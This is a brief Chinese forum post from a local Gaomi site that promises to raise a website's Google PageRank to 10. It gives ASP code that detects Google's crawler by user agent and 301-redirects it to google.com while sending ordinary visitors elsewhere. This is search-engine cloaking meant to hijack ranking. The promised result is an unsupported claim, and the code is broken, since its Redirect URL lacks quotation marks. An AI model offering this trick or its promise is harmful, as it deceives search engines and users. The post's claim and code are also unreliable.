高密吧是高密老百姓的交流互动平台,是以高密信息港和高密论坛为主题.
发新话题
打印

网站pr值迅速提高到10的方法

网站pr值迅速提高到10的方法

在网站的首页顶部加入以下代码,只要google蜘蛛找到你的网站,下次更新,你的网站的pr值就会变成10了

代码为ASP语言
<%
if instr(Request.ServerVariables("HTTP_USER_AGENT"),"Google") then
Response.Status="301 Moved Permanently"
Response.AddHeader "Location","http://www.google.com/"
Response.End()
else
Response.Redirect(http://www.gaomiba.com)
end if
%>

TOP

发新话题